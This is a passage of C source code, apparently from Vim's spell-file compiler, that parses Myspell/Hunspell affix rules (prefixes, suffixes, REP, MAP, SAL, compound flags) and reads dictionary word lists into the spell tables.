spin->si_nobreak = TRUE;
}
else if (is_aff_rule(items, itemcnt, "NOSPLITSUGS", 1))
{
spin->si_nosplitsugs = TRUE;
}
else if (is_aff_rule(items, itemcnt, "NOCOMPOUNDSUGS", 1))
{
spin->si_nocompoundsugs = TRUE;
}
else if (is_aff_rule(items, itemcnt, "NOSUGFILE", 1))
{
spin->si_nosugfile = TRUE;
}
else if (is_aff_rule(items, itemcnt, "PFXPOSTPONE", 1))
{
aff->af_pfxpostpone = TRUE;
}
else if (is_aff_rule(items, itemcnt, "IGNOREEXTRA", 1))
{
aff->af_ignoreextra = TRUE;
}
else if ((STRCMP(items[0], "PFX") == 0
|| STRCMP(items[0], "SFX") == 0)
&& aff_todo == 0
&& itemcnt >= 4)
{
int lasti = 4;
char_u key[AH_KEY_LEN];
if (*items[0] == 'P')
tp = &aff->af_pref;
else
tp = &aff->af_suff;
/* Myspell allows the same affix name to be used multiple
* times. The affix files that do this have an undocumented
* "S" flag on all but the last block, thus we check for that
* and store it in ah_follows. */
vim_strncpy(key, items[1], AH_KEY_LEN - 1);
hi = hash_find(tp, key);
if (!HASHITEM_EMPTY(hi))
{
cur_aff = HI2AH(hi);
if (cur_aff->ah_combine != (*items[2] == 'Y'))
smsg((char_u *)_("Different combining flag in continued affix block in %s line %d: %s"),
fname, lnum, items[1]);
if (!cur_aff->ah_follows)
smsg((char_u *)_("Duplicate affix in %s line %d: %s"),
fname, lnum, items[1]);
}
else
{
/* New affix letter. */
cur_aff = (affheader_T *)getroom(spin,
sizeof(affheader_T), TRUE);
if (cur_aff == NULL)
break;
cur_aff->ah_flag = affitem2flag(aff->af_flagtype, items[1],
fname, lnum);
if (cur_aff->ah_flag == 0 || STRLEN(items[1]) >= AH_KEY_LEN)
break;
if (cur_aff->ah_flag == aff->af_bad
|| cur_aff->ah_flag == aff->af_rare
|| cur_aff->ah_flag == aff->af_keepcase
|| cur_aff->ah_flag == aff->af_needaffix
|| cur_aff->ah_flag == aff->af_circumfix
|| cur_aff->ah_flag == aff->af_nosuggest
|| cur_aff->ah_flag == aff->af_needcomp
|| cur_aff->ah_flag == aff->af_comproot)
smsg((char_u *)_("Affix also used for BAD/RARE/KEEPCASE/NEEDAFFIX/NEEDCOMPOUND/NOSUGGEST in %s line %d: %s"),
fname, lnum, items[1]);
STRCPY(cur_aff->ah_key, items[1]);
hash_add(tp, cur_aff->ah_key);
cur_aff->ah_combine = (*items[2] == 'Y');
}
/* Check for the "S" flag, which apparently means that another
* block with the same affix name is following. */
if (itemcnt > lasti && STRCMP(items[lasti], "S") == 0)
{
++lasti;
cur_aff->ah_follows = TRUE;
}
else
cur_aff->ah_follows = FALSE;
/* Myspell allows extra text after the item, but that might
* mean mistakes go unnoticed. Require a comment-starter. */
if (itemcnt > lasti && *items[lasti] != '#')
smsg((char_u *)_(e_afftrailing), fname, lnum, items[lasti]);
if (STRCMP(items[2], "Y") != 0 && STRCMP(items[2], "N") != 0)
smsg((char_u *)_("Expected Y or N in %s line %d: %s"),
fname, lnum, items[2]);
if (*items[0] == 'P' && aff->af_pfxpostpone)
{
if (cur_aff->ah_newID == 0)
{
/* Use a new number in the .spl file later, to be able
* to handle multiple .aff files. */
check_renumber(spin);
cur_aff->ah_newID = ++spin->si_newprefID;
/* We only really use ah_newID if the prefix is
* postponed. We know that only after handling all
* the items. */
did_postpone_prefix = FALSE;
}
else
/* Did use the ID in a previous block. */
did_postpone_prefix = TRUE;
}
aff_todo = atoi((char *)items[3]);
}
else if ((STRCMP(items[0], "PFX") == 0
|| STRCMP(items[0], "SFX") == 0)
&& aff_todo > 0
&& STRCMP(cur_aff->ah_key, items[1]) == 0
&& itemcnt >= 5)
{
affentry_T *aff_entry;
int upper = FALSE;
int lasti = 5;
/* Myspell allows extra text after the item, but that might
* mean mistakes go unnoticed. Require a comment-starter,
* unless IGNOREEXTRA is used. Hunspell uses a "-" item. */
if (itemcnt > lasti
&& !aff->af_ignoreextra
&& *items[lasti] != '#'
&& (STRCMP(items[lasti], "-") != 0
|| itemcnt != lasti + 1))
smsg((char_u *)_(e_afftrailing), fname, lnum, items[lasti]);
/* New item for an affix letter. */
--aff_todo;
aff_entry = (affentry_T *)getroom(spin,
sizeof(affentry_T), TRUE);
if (aff_entry == NULL)
break;
if (STRCMP(items[2], "0") != 0)
aff_entry->ae_chop = getroom_save(spin, items[2]);
if (STRCMP(items[3], "0") != 0)
{
aff_entry->ae_add = getroom_save(spin, items[3]);
/* Recognize flags on the affix: abcd/XYZ */
aff_entry->ae_flags = vim_strchr(aff_entry->ae_add, '/');
if (aff_entry->ae_flags != NULL)
{
*aff_entry->ae_flags++ = NUL;
aff_process_flags(aff, aff_entry);
}
}
/* Don't use an affix entry with non-ASCII characters when
* "spin->si_ascii" is TRUE. */
if (!spin->si_ascii || !(has_non_ascii(aff_entry->ae_chop)
|| has_non_ascii(aff_entry->ae_add)))
{
aff_entry->ae_next = cur_aff->ah_first;
cur_aff->ah_first = aff_entry;
if (STRCMP(items[4], ".") != 0)
{
char_u buf[MAXLINELEN];
aff_entry->ae_cond = getroom_save(spin, items[4]);
if (*items[0] == 'P')
sprintf((char *)buf, "^%s", items[4]);
else
sprintf((char *)buf, "%s$", items[4]);
aff_entry->ae_prog = vim_regcomp(buf,
RE_MAGIC + RE_STRING + RE_STRICT);
if (aff_entry->ae_prog == NULL)
smsg((char_u *)_("Broken condition in %s line %d: %s"),
fname, lnum, items[4]);
}
/* For postponed prefixes we need an entry in si_prefcond
* for the condition. Use an existing one if possible.
* Can't be done for an affix with flags, ignoring
* COMPOUNDFORBIDFLAG and COMPOUNDPERMITFLAG. */
if (*items[0] == 'P' && aff->af_pfxpostpone
&& aff_entry->ae_flags == NULL)
{
/* When the chop string is one lower-case letter and
* the add string ends in the upper-case letter we set
* the "upper" flag, clear "ae_chop" and remove the
* letters from "ae_add". The condition must either
* be empty or start with the same letter. */
if (aff_entry->ae_chop != NULL
&& aff_entry->ae_add != NULL
#ifdef FEAT_MBYTE
&& aff_entry->ae_chop[(*mb_ptr2len)(
aff_entry->ae_chop)] == NUL
#else
&& aff_entry->ae_chop[1] == NUL
#endif
)
{
int c, c_up;
c = PTR2CHAR(aff_entry->ae_chop);
c_up = SPELL_TOUPPER(c);
if (c_up != c
&& (aff_entry->ae_cond == NULL
|| PTR2CHAR(aff_entry->ae_cond) == c))
{
p = aff_entry->ae_add
+ STRLEN(aff_entry->ae_add);
mb_ptr_back(aff_entry->ae_add, p);
if (PTR2CHAR(p) == c_up)
{
upper = TRUE;
aff_entry->ae_chop = NULL;
*p = NUL;
/* The condition is matched with the
* actual word, thus must check for the
* upper-case letter. */
if (aff_entry->ae_cond != NULL)
{
char_u buf[MAXLINELEN];
#ifdef FEAT_MBYTE
if (has_mbyte)
{
onecap_copy(items[4], buf, TRUE);
aff_entry->ae_cond = getroom_save(
spin, buf);
}
else
#endif
*aff_entry->ae_cond = c_up;
if (aff_entry->ae_cond != NULL)
{
sprintf((char *)buf, "^%s",
aff_entry->ae_cond);
vim_regfree(aff_entry->ae_prog);
aff_entry->ae_prog = vim_regcomp(
buf, RE_MAGIC + RE_STRING);
}
}
}
}
}
if (aff_entry->ae_chop == NULL
&& aff_entry->ae_flags == NULL)
{
int idx;
char_u **pp;
int n;
/* Find a previously used condition. */
for (idx = spin->si_prefcond.ga_len - 1; idx >= 0;
--idx)
{
p = ((char_u **)spin->si_prefcond.ga_data)[idx];
if (str_equal(p, aff_entry->ae_cond))
break;
}
if (idx < 0 && ga_grow(&spin->si_prefcond, 1) == OK)
{
/* Not found, add a new condition. */
idx = spin->si_prefcond.ga_len++;
pp = ((char_u **)spin->si_prefcond.ga_data)
+ idx;
if (aff_entry->ae_cond == NULL)
*pp = NULL;
else
*pp = getroom_save(spin,
aff_entry->ae_cond);
}
/* Add the prefix to the prefix tree. */
if (aff_entry->ae_add == NULL)
p = (char_u *)"";
else
p = aff_entry->ae_add;
/* PFX_FLAGS is a negative number, so that
* tree_add_word() knows this is the prefix tree. */
n = PFX_FLAGS;
if (!cur_aff->ah_combine)
n |= WFP_NC;
if (upper)
n |= WFP_UP;
if (aff_entry->ae_comppermit)
n |= WFP_COMPPERMIT;
if (aff_entry->ae_compforbid)
n |= WFP_COMPFORBID;
tree_add_word(spin, p, spin->si_prefroot, n,
idx, cur_aff->ah_newID);
did_postpone_prefix = TRUE;
}
/* Didn't actually use ah_newID, backup si_newprefID. */
if (aff_todo == 0 && !did_postpone_prefix)
{
--spin->si_newprefID;
cur_aff->ah_newID = 0;
}
}
}
}
else if (is_aff_rule(items, itemcnt, "FOL", 2) && fol == NULL)
{
fol = vim_strsave(items[1]);
}
else if (is_aff_rule(items, itemcnt, "LOW", 2) && low == NULL)
{
low = vim_strsave(items[1]);
}
else if (is_aff_rule(items, itemcnt, "UPP", 2) && upp == NULL)
{
upp = vim_strsave(items[1]);
}
else if (is_aff_rule(items, itemcnt, "REP", 2)
|| is_aff_rule(items, itemcnt, "REPSAL", 2))
{
/* Ignore REP/REPSAL count */;
if (!isdigit(*items[1]))
smsg((char_u *)_("Expected REP(SAL) count in %s line %d"),
fname, lnum);
}
else if ((STRCMP(items[0], "REP") == 0
|| STRCMP(items[0], "REPSAL") == 0)
&& itemcnt >= 3)
{
/* REP/REPSAL item */
/* Myspell ignores extra arguments, we require it starts with
* # to detect mistakes. */
if (itemcnt > 3 && items[3][0] != '#')
smsg((char_u *)_(e_afftrailing), fname, lnum, items[3]);
if (items[0][3] == 'S' ? do_repsal : do_rep)
{
/* Replace underscore with space (can't include a space
* directly). */
for (p = items[1]; *p != NUL; mb_ptr_adv(p))
if (*p == '_')
*p = ' ';
for (p = items[2]; *p != NUL; mb_ptr_adv(p))
if (*p == '_')
*p = ' ';
add_fromto(spin, items[0][3] == 'S'
? &spin->si_repsal
: &spin->si_rep, items[1], items[2]);
}
}
else if (is_aff_rule(items, itemcnt, "MAP", 2))
{
/* MAP item or count */
if (!found_map)
{
/* First line contains the count. */
found_map = TRUE;
if (!isdigit(*items[1]))
smsg((char_u *)_("Expected MAP count in %s line %d"),
fname, lnum);
}
else if (do_mapline)
{
int c;
/* Check that every character appears only once. */
for (p = items[1]; *p != NUL; )
{
#ifdef FEAT_MBYTE
c = mb_ptr2char_adv(&p);
#else
c = *p++;
#endif
if ((spin->si_map.ga_len > 0
&& vim_strchr(spin->si_map.ga_data, c)
!= NULL)
|| vim_strchr(p, c) != NULL)
smsg((char_u *)_("Duplicate character in MAP in %s line %d"),
fname, lnum);
}
/* We simply concatenate all the MAP strings, separated by
* slashes. */
ga_concat(&spin->si_map, items[1]);
ga_append(&spin->si_map, '/');
}
}
/* Accept "SAL from to" and "SAL from to #comment". */
else if (is_aff_rule(items, itemcnt, "SAL", 3))
{
if (do_sal)
{
/* SAL item (sounds-a-like)
* Either one of the known keys or a from-to pair. */
if (STRCMP(items[1], "followup") == 0)
spin->si_followup = sal_to_bool(items[2]);
else if (STRCMP(items[1], "collapse_result") == 0)
spin->si_collapse = sal_to_bool(items[2]);
else if (STRCMP(items[1], "remove_accents") == 0)
spin->si_rem_accents = sal_to_bool(items[2]);
else
/* when "to" is "_" it means empty */
add_fromto(spin, &spin->si_sal, items[1],
STRCMP(items[2], "_") == 0 ? (char_u *)""
: items[2]);
}
}
else if (is_aff_rule(items, itemcnt, "SOFOFROM", 2)
&& sofofrom == NULL)
{
sofofrom = getroom_save(spin, items[1]);
}
else if (is_aff_rule(items, itemcnt, "SOFOTO", 2)
&& sofoto == NULL)
{
sofoto = getroom_save(spin, items[1]);
}
else if (STRCMP(items[0], "COMMON") == 0)
{
int i;
for (i = 1; i < itemcnt; ++i)
{
if (HASHITEM_EMPTY(hash_find(&spin->si_commonwords,
items[i])))
{
p = vim_strsave(items[i]);
if (p == NULL)
break;
hash_add(&spin->si_commonwords, p);
}
}
}
else
smsg((char_u *)_("Unrecognized or duplicate item in %s line %d: %s"),
fname, lnum, items[0]);
}
}
if (fol != NULL || low != NULL || upp != NULL)
{
if (spin->si_clear_chartab)
{
/* Clear the char type tables, don't want to use any of the
* currently used spell properties. */
init_spell_chartab();
spin->si_clear_chartab = FALSE;
}
/*
* Don't write a word table for an ASCII file, so that we don't check
* for conflicts with a word table that matches 'encoding'.
* Don't write one for utf-8 either, we use utf_*() and
* mb_get_class(), the list of chars in the file will be incomplete.
*/
if (!spin->si_ascii
#ifdef FEAT_MBYTE
&& !enc_utf8
#endif
)
{
if (fol == NULL || low == NULL || upp == NULL)
smsg((char_u *)_("Missing FOL/LOW/UPP line in %s"), fname);
else
(void)set_spell_chartab(fol, low, upp);
}
vim_free(fol);
vim_free(low);
vim_free(upp);
}
/* Use compound specifications of the .aff file for the spell info. */
if (compmax != 0)
{
aff_check_number(spin->si_compmax, compmax, "COMPOUNDWORDMAX");
spin->si_compmax = compmax;
}
if (compminlen != 0)
{
aff_check_number(spin->si_compminlen, compminlen, "COMPOUNDMIN");
spin->si_compminlen = compminlen;
}
if (compsylmax != 0)
{
if (syllable == NULL)
smsg((char_u *)_("COMPOUNDSYLMAX used without SYLLABLE"));
aff_check_number(spin->si_compsylmax, compsylmax, "COMPOUNDSYLMAX");
spin->si_compsylmax = compsylmax;
}
if (compoptions != 0)
{
aff_check_number(spin->si_compoptions, compoptions, "COMPOUND options");
spin->si_compoptions |= compoptions;
}
if (compflags != NULL)
process_compflags(spin, aff, compflags);
/* Check that we didn't use too many renumbered flags. */
if (spin->si_newcompID < spin->si_newprefID)
{
if (spin->si_newcompID == 127 || spin->si_newcompID == 255)
MSG(_("Too many postponed prefixes"));
else if (spin->si_newprefID == 0 || spin->si_newprefID == 127)
MSG(_("Too many compound flags"));
else
MSG(_("Too many postponed prefixes and/or compound flags"));
}
if (syllable != NULL)
{
aff_check_string(spin->si_syllable, syllable, "SYLLABLE");
spin->si_syllable = syllable;
}
if (sofofrom != NULL || sofoto != NULL)
{
if (sofofrom == NULL || sofoto == NULL)
smsg((char_u *)_("Missing SOFO%s line in %s"),
sofofrom == NULL ? "FROM" : "TO", fname);
else if (spin->si_sal.ga_len > 0)
smsg((char_u *)_("Both SAL and SOFO lines in %s"), fname);
else
{
aff_check_string(spin->si_sofofr, sofofrom, "SOFOFROM");
aff_check_string(spin->si_sofoto, sofoto, "SOFOTO");
spin->si_sofofr = sofofrom;
spin->si_sofoto = sofoto;
}
}
if (midword != NULL)
{
aff_check_string(spin->si_midword, midword, "MIDWORD");
spin->si_midword = midword;
}
vim_free(pc);
fclose(fd);
return aff;
}
/*
* Return TRUE when items[0] equals "rulename", there are "mincount" items or
* a comment is following after item "mincount".
*/
static int
is_aff_rule(
char_u **items,
int itemcnt,
char *rulename,
int mincount)
{
return (STRCMP(items[0], rulename) == 0
&& (itemcnt == mincount
|| (itemcnt > mincount && items[mincount][0] == '#')));
}
/*
* For affix "entry" move COMPOUNDFORBIDFLAG and COMPOUNDPERMITFLAG from
* ae_flags to ae_comppermit and ae_compforbid.
*/
static void
aff_process_flags(afffile_T *affile, affentry_T *entry)
{
char_u *p;
char_u *prevp;
unsigned flag;
if (entry->ae_flags != NULL
&& (affile->af_compforbid != 0 || affile->af_comppermit != 0))
{
for (p = entry->ae_flags; *p != NUL; )
{
prevp = p;
flag = get_affitem(affile->af_flagtype, &p);
if (flag == affile->af_comppermit || flag == affile->af_compforbid)
{
STRMOVE(prevp, p);
p = prevp;
if (flag == affile->af_comppermit)
entry->ae_comppermit = TRUE;
else
entry->ae_compforbid = TRUE;
}
if (affile->af_flagtype == AFT_NUM && *p == ',')
++p;
}
if (*entry->ae_flags == NUL)
entry->ae_flags = NULL; /* nothing left */
}
}
/*
* Return TRUE if "s" is the name of an info item in the affix file.
*/
static int
spell_info_item(char_u *s)
{
return STRCMP(s, "NAME") == 0
|| STRCMP(s, "HOME") == 0
|| STRCMP(s, "VERSION") == 0
|| STRCMP(s, "AUTHOR") == 0
|| STRCMP(s, "EMAIL") == 0
|| STRCMP(s, "COPYRIGHT") == 0;
}
/*
* Turn an affix flag name into a number, according to the FLAG type.
* returns zero for failure.
*/
static unsigned
affitem2flag(
int flagtype,
char_u *item,
char_u *fname,
int lnum)
{
unsigned res;
char_u *p = item;
res = get_affitem(flagtype, &p);
if (res == 0)
{
if (flagtype == AFT_NUM)
smsg((char_u *)_("Flag is not a number in %s line %d: %s"),
fname, lnum, item);
else
smsg((char_u *)_("Illegal flag in %s line %d: %s"),
fname, lnum, item);
}
if (*p != NUL)
{
smsg((char_u *)_(e_affname), fname, lnum, item);
return 0;
}
return res;
}
/*
* Get one affix name from "*pp" and advance the pointer.
* Returns zero for an error, still advances the pointer then.
*/
static unsigned
get_affitem(int flagtype, char_u **pp)
{
int res;
if (flagtype == AFT_NUM)
{
if (!VIM_ISDIGIT(**pp))
{
++*pp; /* always advance, avoid getting stuck */
return 0;
}
res = getdigits(pp);
}
else
{
#ifdef FEAT_MBYTE
res = mb_ptr2char_adv(pp);
#else
res = *(*pp)++;
#endif
if (flagtype == AFT_LONG || (flagtype == AFT_CAPLONG
&& res >= 'A' && res <= 'Z'))
{
if (**pp == NUL)
return 0;
#ifdef FEAT_MBYTE
res = mb_ptr2char_adv(pp) + (res << 16);
#else
res = *(*pp)++ + (res << 16);
#endif
}
}
return res;
}
/*
* Process the "compflags" string used in an affix file and append it to
* spin->si_compflags.
* The processing involves changing the affix names to ID numbers, so that
* they fit in one byte.
*/
static void
process_compflags(
spellinfo_T *spin,
afffile_T *aff,
char_u *compflags)
{
char_u *p;
char_u *prevp;
unsigned flag;
compitem_T *ci;
int id;
int len;
char_u *tp;
char_u key[AH_KEY_LEN];
hashitem_T *hi;
/* Make room for the old and the new compflags, concatenated with a / in
* between. Processing it makes it shorter, but we don't know by how
* much, thus allocate the maximum. */
len = (int)STRLEN(compflags) + 1;
if (spin->si_compflags != NULL)
len += (int)STRLEN(spin->si_compflags) + 1;
p = getroom(spin, len, FALSE);
if (p == NULL)
return;
if (spin->si_compflags != NULL)
{
STRCPY(p, spin->si_compflags);
STRCAT(p, "/");
}
spin->si_compflags = p;
tp = p + STRLEN(p);
for (p = compflags; *p != NUL; )
{
if (vim_strchr((char_u *)"/?*+[]", *p) != NULL)
/* Copy non-flag characters directly. */
*tp++ = *p++;
else
{
/* First get the flag number, also checks validity. */
prevp = p;
flag = get_affitem(aff->af_flagtype, &p);
if (flag != 0)
{
/* Find the flag in the hashtable. If it was used before, use
* the existing ID. Otherwise add a new entry. */
vim_strncpy(key, prevp, p - prevp);
hi = hash_find(&aff->af_comp, key);
if (!HASHITEM_EMPTY(hi))
id = HI2CI(hi)->ci_newID;
else
{
ci = (compitem_T *)getroom(spin, sizeof(compitem_T), TRUE);
if (ci == NULL)
break;
STRCPY(ci->ci_key, key);
ci->ci_flag = flag;
/* Avoid using a flag ID that has a special meaning in a
* regexp (also inside []). */
do
{
check_renumber(spin);
id = spin->si_newcompID--;
} while (vim_strchr((char_u *)"/?*+[]\\-^", id) != NULL);
ci->ci_newID = id;
hash_add(&aff->af_comp, ci->ci_key);
}
*tp++ = id;
}
if (aff->af_flagtype == AFT_NUM && *p == ',')
++p;
}
}
*tp = NUL;
}
/*
* Check that the new IDs for postponed affixes and compounding don't overrun
* each other. We have almost 255 available, but start at 0-127 to avoid
* using two bytes for utf-8. When the 0-127 range is used up go to 128-255.
* When that is used up an error message is given.
*/
static void
check_renumber(spellinfo_T *spin)
{
if (spin->si_newprefID == spin->si_newcompID && spin->si_newcompID < 128)
{
spin->si_newprefID = 127;
spin->si_newcompID = 255;
}
}
/*
* Return TRUE if flag "flag" appears in affix list "afflist".
*/
static int
flag_in_afflist(int flagtype, char_u *afflist, unsigned flag)
{
char_u *p;
unsigned n;
switch (flagtype)
{
case AFT_CHAR:
return vim_strchr(afflist, flag) != NULL;
case AFT_CAPLONG:
case AFT_LONG:
for (p = afflist; *p != NUL; )
{
#ifdef FEAT_MBYTE
n = mb_ptr2char_adv(&p);
#else
n = *p++;
#endif
if ((flagtype == AFT_LONG || (n >= 'A' && n <= 'Z'))
&& *p != NUL)
#ifdef FEAT_MBYTE
n = mb_ptr2char_adv(&p) + (n << 16);
#else
n = *p++ + (n << 16);
#endif
if (n == flag)
return TRUE;
}
break;
case AFT_NUM:
for (p = afflist; *p != NUL; )
{
n = getdigits(&p);
if (n == flag)
return TRUE;
if (*p != NUL) /* skip over comma */
++p;
}
break;
}
return FALSE;
}
/*
* Give a warning when "spinval" and "affval" numbers are set and not the same.
*/
static void
aff_check_number(int spinval, int affval, char *name)
{
if (spinval != 0 && spinval != affval)
smsg((char_u *)_("%s value differs from what is used in another .aff file"), name);
}
/*
* Give a warning when "spinval" and "affval" strings are set and not the same.
*/
static void
aff_check_string(char_u *spinval, char_u *affval, char *name)
{
if (spinval != NULL && STRCMP(spinval, affval) != 0)
smsg((char_u *)_("%s value differs from what is used in another .aff file"), name);
}
/*
* Return TRUE if strings "s1" and "s2" are equal. Also consider both being
* NULL as equal.
*/
static int
str_equal(char_u *s1, char_u *s2)
{
if (s1 == NULL || s2 == NULL)
return s1 == s2;
return STRCMP(s1, s2) == 0;
}
/*
* Add a from-to item to "gap". Used for REP and SAL items.
* They are stored case-folded.
*/
static void
add_fromto(
spellinfo_T *spin,
garray_T *gap,
char_u *from,
char_u *to)
{
fromto_T *ftp;
char_u word[MAXWLEN];
if (ga_grow(gap, 1) == OK)
{
ftp = ((fromto_T *)gap->ga_data) + gap->ga_len;
(void)spell_casefold(from, (int)STRLEN(from), word, MAXWLEN);
ftp->ft_from = getroom_save(spin, word);
(void)spell_casefold(to, (int)STRLEN(to), word, MAXWLEN);
ftp->ft_to = getroom_save(spin, word);
++gap->ga_len;
}
}
/*
* Convert a boolean argument in a SAL line to TRUE or FALSE;
*/
static int
sal_to_bool(char_u *s)
{
return STRCMP(s, "1") == 0 || STRCMP(s, "true") == 0;
}
/*
* Free the structure filled by spell_read_aff().
*/
static void
spell_free_aff(afffile_T *aff)
{
hashtab_T *ht;
hashitem_T *hi;
int todo;
affheader_T *ah;
affentry_T *ae;
vim_free(aff->af_enc);
/* All this trouble to free the "ae_prog" items... */
for (ht = &aff->af_pref; ; ht = &aff->af_suff)
{
todo = (int)ht->ht_used;
for (hi = ht->ht_array; todo > 0; ++hi)
{
if (!HASHITEM_EMPTY(hi))
{
--todo;
ah = HI2AH(hi);
for (ae = ah->ah_first; ae != NULL; ae = ae->ae_next)
vim_regfree(ae->ae_prog);
}
}
if (ht == &aff->af_suff)
break;
}
hash_clear(&aff->af_pref);
hash_clear(&aff->af_suff);
hash_clear(&aff->af_comp);
}
/*
* Read dictionary file "fname".
* Returns OK or FAIL;
*/
static int
spell_read_dic(spellinfo_T *spin, char_u *fname, afffile_T *affile)
{
hashtab_T ht;
char_u line[MAXLINELEN];
char_u *p;
char_u *afflist;
char_u store_afflist[MAXWLEN];
int pfxlen;
int need_affix;
char_u *dw;
char_u *pc;
char_u *w;
int l;
hash_T hash;
hashitem_T *hi;
FILE *fd;
int lnum = 1;
int non_ascii = 0;
int retval = OK;
char_u message[MAXLINELEN + MAXWLEN];
int flags;
int duplicate = 0;
/*
* Open the file.
*/
fd = mch_fopen((char *)fname, "r");
if (fd == NULL)
{
EMSG2(_(e_notopen), fname);
return FAIL;
}
/* The hashtable is only used to detect duplicated words. */
hash_init(&ht);
vim_snprintf((char *)IObuff, IOSIZE,
_("Reading dictionary file %s ..."), fname);
spell_message(spin, IObuff);
/* start with a message for the first line */
spin->si_msg_count = 999999;
/* Read and ignore the first line: word count. */
(void)vim_fgets(line, MAXLINELEN, fd);
if (!vim_isdigit(*skipwhite(line)))
EMSG2(_("E760: No word count in %s"), fname);
/*
* Read all the lines in the file one by one.
* The words are converted to 'encoding' here, before being added to
* the hashtable.
*/
while (!vim_fgets(line, MAXLINELEN, fd) && !got_int)
{
line_breakcheck();
++lnum;
if (line[0] == '#' || line[0] == '/')
continue; /* comment line */
/* Remove CR, LF and white space from the end. White space halfway
* the word is kept to allow e.g., "et al.". */
l = (int)STRLEN(line);
while (l > 0 && line[l - 1] <= ' ')
--l;
if (l == 0)
continue; /* empty line */
line[l] = NUL;
#ifdef FEAT_MBYTE
/* Convert from "SET" to 'encoding' when needed. */
if (spin->si_conv.vc_type != CONV_NONE)
{
pc = string_convert(&spin->si_conv, line, NULL);
if (pc == NULL)
{
smsg((char_u *)_("Conversion failure for word in %s line %d: %s"),
fname, lnum, line);
continue;
}
w = pc;
}
else
#endif
{
pc = NULL;
w = line;
}
/* Truncate the word at the "/", set "afflist" to what follows.
* Replace "\/" by "/" and "\\" by "\". */
afflist = NULL;
for (p = w; *p != NUL; mb_ptr_adv(p))
{
if (*p == '\\' && (p[1] == '\\' || p[1] == '/'))
STRMOVE(p, p + 1);
else if (*p == '/')
{
*p = NUL;
afflist = p + 1;
break;
}
}
/* Skip non-ASCII words when "spin->si_ascii" is TRUE. */
if (spin->si_ascii && has_non_ascii(w))
{
++non_ascii;
vim_free(pc);
continue;
}
/* This takes time, print a message every 10000 words. */
if (spin->si_verbose && spin->si_msg_count > 10000)
{
spin->si_msg_count = 0;
vim_snprintf((char *)message, sizeof(message),
_("line %6d, word %6d - %s"),
lnum, spin->si_foldwcount + spin->si_keepwcount, w);
msg_start();
msg_puts_long_attr(message, 0);
msg_clr_eos();
msg_didout = FALSE;
msg_col = 0;
out_flush();
}
/* Store the word in the hashtable to be able to find duplicates. */
dw = (char_u *)getroom_save(spin, w);
if (dw == NULL)
{
retval = FAIL;
vim_free(pc);
break;
}
hash = hash_hash(dw);
hi = hash_lookup(&ht, dw, hash);
if (!HASHITEM_EMPTY(hi))
{
if (p_verbose > 0)
smsg((char_u *)_("Duplicate word in %s line %d: %s"),
fname, lnum, dw);
else if (duplicate == 0)
smsg((char_u *)_("First duplicate word in %s line %d: %s"),
fname, lnum, dw);
++duplicate;
}
else
hash_add_item(&ht, hi, dw, hash);
flags = 0;
store_afflist[0] = NUL;
pfxlen = 0;
need_affix = FALSE;
if (afflist != NULL)
{
/* Extract flags from the affix list. */
flags |= get_affix_flags(affile, afflist);
if (affile->af_needaffix != 0 && flag_in_afflist(
affile->af_flagtype, afflist, affile->af_needaffix))
need_affix = TRUE;
if (affile->af_pfxpostpone)
/* Need to store the list of prefix IDs with the word. */
pfxlen = get_pfxlist(affile, afflist, store_afflist);
if (spin->si_compflags != NULL)
/* Need to store the list of compound flags with the word.
* Concatenate them to the list of prefix IDs. */
get_compflags(affile, afflist, store_afflist + pfxlen);
}
/* Add the word to the word tree(s). */
if (store_word(spin, dw, flags, spin->si_region,
store_afflist, need_affix) == FAIL)
retval = FAIL;
if (afflist != NULL)
{
/* Find all matching suffixes and add the resulting words.
* Additionally do matching prefixes that combine. */
if (store_aff_word(spin, dw, afflist, affile,
&affile->af_suff, &affile->af_pref,
CONDIT_SUF, flags, store_afflist, pfxlen) == FAIL)
retval = FAIL;
/* Find all matching prefixes and add the resulting words. */
if (store_aff_word(spin, dw, afflist, affile,
&affile->af_pref, NULL,
CONDIT_SUF, flags, store_afflist, pfxlen) == FAIL)
retval = FAIL;
}
vim_free(pc);
}
if (duplicate > 0)
smsg((char_u *)_("%d duplicate word(s) in %s"), duplicate, fname);
if (spin->si_ascii && non_ascii > 0)
smsg((char_u *)_("Ignored %d word(s) with non-ASCII characters in %s"),
non_ascii, fname);
hash_clear(&ht);
fclose(fd);
return retval;
}
/*
* Check for affix flags in "afflist" that are turned into word flags.
* Return WF_ flags.
*/
static int
get_affix_flags(afffile_T *affile, char_u *afflist)
{
int flags = 0;
if (affile->af_keepcase != 0 && flag_in_afflist(
affile->af_flagtype, afflist, affile->af_keepcase))
flags |= WF_KEEPCAP | WF_FIXCAP;
if (affile->af_rare != 0 && flag_in_afflist(
affile->af_flagtype, afflist, affile->af_rare))
flags |= WF_RARE;
if (affile->af_bad != 0 && flag_in_afflist(
affile->af_flagtype, afflist, affile->af_bad))
flags |= WF_BANNED;
if (affile->af_needcomp != 0 && flag_in_afflist(
affile->af_flagtype, afflist, affile->af_needcomp))
flags |= WF_NEEDCOMP;
if (affile->af_comproot != 0 && flag_in_afflist(
affile->af_flagtype, afflist, affile->af_comproot))
flags |= WF_COMPROOT;
if (affile->af_nosuggest != 0 && flag_in_afflist(
affile->af_flagtype, afflist, affile->af_nosuggest))
flags |= WF_NOSUGGEST;
return flags;
}
/*
* Get the list of prefix IDs from the affix list "afflist".
* Used for PFXPOSTPONE.
* Put the resulting flags in "store_afflist[MAXWLEN]" with a terminating NUL
* and return the number of affixes.
*/
static int
get_pfxlist(
afffile_T *affile,
char_u *afflist,
char_u *store_afflist)
{
char_u *p;
char_u *prevp;
int cnt = 0;
int id;
char_u key[AH_KEY_LEN];
hashitem_T *hi;
for (p = afflist; *p != NUL; )
{
prevp = p;
if (get_affitem(affile->af_flagtype, &p) != 0)
{
/* A flag is a postponed prefix flag if it appears in "af_pref"
* and it's ID is not zero. */
vim_strncpy(key, prevp, p - prevp);
hi = hash_find(&affile->af_pref, key);
if (!HASHITEM_EMPTY(hi))
{
id = HI2AH(hi)->ah_newID;
if (id != 0)
store_afflist[cnt++] = id;
}
}
if (affile->af_flagtype == AFT_NUM && *p == ',')
++p;
}
store_afflist[cnt] = NUL;
return cnt;
}
/*
* Get the list of compound IDs from the affix list "afflist" that are used
* for compound words.
* Puts the flags in "store_afflist[]".
*/
static void
get_compflags(
afffile_T *affile,
char_u *afflist,
char_u *store_afflist)
{
char_u *p;
char_u *prevp;
int cnt = 0;
char_u key[AH_KEY_LEN];
hashitem_T *hi;
for (p = afflist; *p != NUL; )
{
prevp = p;
if (get_affitem(affile->af_flagtype, &p) != 0)
{
/* A flag is a compound flag if it appears in "af_comp". */
vim_strncpy(key, prevp, p - prevp);
